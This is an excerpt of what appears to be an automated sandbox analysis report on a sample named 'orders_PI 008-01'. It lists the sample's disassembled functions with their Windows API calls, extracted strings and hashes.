                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                        • API String ID: 3510742995-2446657581
                                        • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                        • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                        • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                        • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                        Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                        • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                        • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                        • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                        • memset.MSVCRT ref: 00405ABB
                                        • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                        • SetFocus.USER32(?), ref: 00405B76
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$FocusItemmemset
                                        • String ID:
                                        • API String ID: 4281309102-0
                                        • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                        • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                        • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                        • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                        Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _snwprintfwcscat
                                        • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                        • API String ID: 384018552-4153097237
                                        • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                        • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                        • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                        • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                        Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ItemMenu$CountInfomemsetwcschr
                                        • String ID: 0$6
                                        • API String ID: 2029023288-3849865405
                                        • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                        • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                        • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                        • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                        Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                        • memset.MSVCRT ref: 00405455
                                        • memset.MSVCRT ref: 0040546C
                                        • memset.MSVCRT ref: 00405483
                                        • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                        • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$memcpy$ErrorLast
                                        • String ID: 6$\
                                        • API String ID: 404372293-1284684873
                                        • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                        • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                        • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                        • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                        Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                        • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                        • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                        • wcscpy.MSVCRT ref: 0040A0D9
                                        • wcscat.MSVCRT ref: 0040A0E6
                                        • wcscat.MSVCRT ref: 0040A0F5
                                        • wcscpy.MSVCRT ref: 0040A107
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                        • String ID:
                                        • API String ID: 1331804452-0
                                        • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                        • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                        • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                        • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                        Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                        • String ID: advapi32.dll
                                        • API String ID: 2012295524-4050573280
                                        • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                        • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                        • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                        • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                        Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        • <?xml version="1.0" ?>, xrefs: 0041007C
                                        • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                        • <%s>, xrefs: 004100A6
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$_snwprintf
                                        • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                        • API String ID: 3473751417-2880344631
                                        • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                        • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                        • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                        • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                        Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: wcscat$_snwprintfmemset
                                        • String ID: %2.2X
                                        • API String ID: 2521778956-791839006
                                        • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                        • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                        • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                        • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                        Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _snwprintfwcscpy
                                        • String ID: dialog_%d$general$menu_%d$strings
                                        • API String ID: 999028693-502967061
                                        • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                        • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                        • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                        • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                        Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • strlen.MSVCRT ref: 00408DFA
                                          • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                        • memset.MSVCRT ref: 00408E46
                                        • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                        • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                        • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                        • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                        • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                        • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$memsetstrlen
                                        • String ID:
                                        • API String ID: 2350177629-0
                                        • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                        • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                        • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                        • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                        Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                        • API String ID: 2221118986-1606337402
                                        • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                        • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                        • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                        • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                        Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                        Download Yara Rule
                                        APIs
                                        • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                        • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                        • memset.MSVCRT ref: 00408FD4
                                        • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                        • memset.MSVCRT ref: 00409042
                                        • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                          • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcmpmemset$_mbscpymemcpystrlen
                                        • String ID:
                                        • API String ID: 265355444-0
                                        • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                        • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                        • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                        • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                        Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                          • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                          • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                          • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                        • memset.MSVCRT ref: 0040C439
                                        • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                        • _wcsupr.MSVCRT ref: 0040C481
                                          • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                          • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                        • memset.MSVCRT ref: 0040C4D0
                                        • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                        • String ID:
                                        • API String ID: 4131475296-0
                                        • Opcode ID: b4109fb38cace7b03c62c87583d72b8469db04adbac5cd884980a40196e27448
                                        • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                        • Opcode Fuzzy Hash: b4109fb38cace7b03c62c87583d72b8469db04adbac5cd884980a40196e27448
                                        • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                        Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 004116FF
                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                          • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                          • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                          • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                          • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                          • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                          • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                          • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                          • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                          • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                        • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                        • API String ID: 2618321458-3614832568
                                        • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                        • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                        • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                        • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                        Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AttributesFilefreememset
                                        • String ID:
                                        • API String ID: 2507021081-0
                                        • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                        • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                        • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                        • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                        Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                        Download Yara Rule
                                        APIs
                                        • AreFileApisANSI.KERNEL32 ref: 004174FC
                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                        • malloc.MSVCRT ref: 00417524
                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                        • free.MSVCRT ref: 00417544
                                        • free.MSVCRT ref: 00417562
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                        • String ID:
                                        • API String ID: 4131324427-0
                                        • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                        • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
